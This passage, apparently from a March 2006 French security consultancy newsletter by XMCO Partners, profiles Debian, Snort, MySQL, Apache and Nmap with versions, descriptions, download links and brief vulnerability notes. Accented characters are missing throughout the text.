Version actuelle version stable 3.1 (20 dcembre 2005) nom de code Sarge version 3.1r1
Utilit

Type Systme dexploitation

Description Debian est un systme dexploitation trs rpandu dans le monde UNIX.
Cette distribution GNU/Linux fut lance en 1993 avec le soutien de la Free
Software Foundation. Disponible pour onze architectures diffrentes (m68k,
SPARC, Alpha, PowerPC, x86, IA-64, PA-RISC, MIPS (big et little-en-
dian), ARM et S/390), Debian contient prs de 15000 paquets et se distin-
gue des autres distributions par sa gestion de paquets APT au format .deb
ce qui permet une mise jour rapide et pratique.
Trois versions sont disponibles 1. La version stable est la version en production. Son utilisation est
recommande. Celle-ci reste fige, seuls les correctifs de scurit sont mis
jour.
2. Une version testing est la future version stable, elle contient les pa-
quets qui nont pas encore t accepts dans la version stable. Les ver-
sions les plus rcentes de chaque logiciel y sont installes.
3. La version unstable (Sid) est une version utilise par les dveloppeurs.
Capture dcran

Tlchargement http://www.debian.org/CD/netinst/
Scurit de loutils Du fait des nombreux paquets proposs par la distribution, de nombreuses
vulnrabilits sont publies chaque semaine.
Lavantage majeur de Debian par rapport aux autres distributions est sa
facult pouvoir tlcharger les nouvelles versions des paquets avec une
simple commande: apt-get <nom du paquet>.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 14

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

Snort
Dispositif de dtection dintrusion
Version actuelle Snort 1.8.1
Utilit

Type Utilitaire de dtection dintrusion (IDS)

Description Snort est un logiciel Open source de dtection dintrusion qui rivalise avec
les outils commerciaux.
Cet utilitaire permet danalyser le trafic dun rseau en temps rel, de d-
tecter de nombreux protocoles ainsi que les activits anormales (Stealth
scan, dcouverte dempreintes, fragments, Dni de services, dbordement
de tampon). La recherche de contenu est galement possible.
Snort se diffrencie par son format ouvert de ses signatures qui permet
dintgrer de nouvelles rgles propres ses besoins. Des signatures sont donc
rapidement en ligne en fonction des menaces du moment ce qui permet une
ractivit indispensable pour la scurit des infrastructures.
Capture dcran

Tlchargement http://www.snort.org/dl/
Scurit de loutils Quelques failles ont t reportes, cependant, la ractivit des dveloppeurs
est bonne.
La liste des vulnrabilits de Snort est disponible ladresse ci-dessous:
http://secunia.com/search/?search=snort

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 15

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

MySQL
SGBD
Version actuelle MySQL 5.0
Utilit

Type SGBD
Description Mysql est un serveur de base de donnes relationnelles SQL rapide qui
permet de grer des bases de donnes de plusieurs traoctets et offre dex-
cellentes performances en termes de monte en charges.
Robuste et Multi-Utilisateurs, cet outil profite de son importance au sein de
la communaut du logiciel libre pour senrichir et samliorer constamment.
Mysql fonctionne sur de nombreuses plateformes tels que AIX, BSDi,
FreeBSD, HP-UX, Linux, Mac OS X, NetBSD, OpenBSD, OS/2 Warp,
SGI Irix, Solaris, SunOS, SCO OpenServer, SCO UnixWare, Tru64 Unix,
Windows 95, 98, NT, 2000 et XP.
Plusieurs outils graphiques peuvent tre utiliss avec MySQL:MySQL
Workbench, MySQL Query Browser, MySQL Administrator (voir capture),
MySQL Migration Toolkit.
Capture dcran

Tlchargement http://www-fr.mysql.com/products/database/mysql/
Scurit de loutils Quelques failles ont t reportes, cependant des mises jour sont propo-
ses rapidement.
La liste des vulnrabilits MySQL est disponible ladresse ci-dessous:
http://secunia.com/search/?search=Mysql

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 16

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

Apache
Serveur HTTP
Version actuelle Apache 2.2.0
Type Serveur HTTP
Utilit

Description Apache est le serveur web le plus rpandu sur Internet, il rivalise directe-
ment son camarade IIS de Microsoft.
Ce projet open-source a pour but de proposer aux internautes un serveur
http fiable, scuris et efficace. Selon ltude mene par Netcraft Web Ser-
ver Survey, prs de 70% des sites Internet utilisent cet outil.
Dvelopp pour le monde UNIX, Apache a rapidement t port sous
Windows.
Capture dcran

Tlchargement http://www.apachefrance.com/Telechargement/4/
Scurit de loutils Quelques failles ont t reportes, cependant des mises jour sont propo-
ses rapidement.
La liste des vulnrabilits Apache est disponible ladresse ci-dessous:
http://secunia.com/search/?search=Apache

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 17

www.xmcopartners.com
 LA SCURIT INFORMATIQUE MARS 2006

Nmap
Scanner de ports
Version actuelle Nmap 4.01
Utilit

Type Scanner de ports

Description Nmap est un scanner de port puissant conu pour dtecter les ports ouverts,
les services hbergs et les informations sur lquipement audit. Cet outil
est donc trs utilis par les administrateurs rseaux afin de connatre les
points dentre et sortie des flux rseau.
Ce scanner se base sur lensemble des protocoles IP, TCP, UDP et ICMP et
analyse les rponses de la pile IP de la machine cible. Cela permet alors
dobtenir lempreinte caractristique de chaque type de machine (impri-
mantes, marque de lordinateur, firewall, routeurs, voIP) et/ou le systme
dexploitation hberg.
Nmap contient 3100 signatures correspondant 381 services diffrents et
presque1700 empreintes de systmes d'exploitation (dont le rcent Mac OS
10.4).
Nmap est donc un outil indispensable qui accueille de nouvelles fonctionna-
lits avec des scans de plus en plus fins chaque mise jour du logiciel.
Capture dcran

Tlchargement http://www.insecure.org/nmap/download.html
Scurit de loutils Peu de failles ont t dcouvertes, lexploitation des failles dun scanner na
que trs peu dintrt puisque son utilisation est ponctuelle.
La liste des vulnrabilits Nmap est disponible ladresse ci-dessous:
http://secunia.com/search/?search=nmap

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 18

www.xmcopartners.com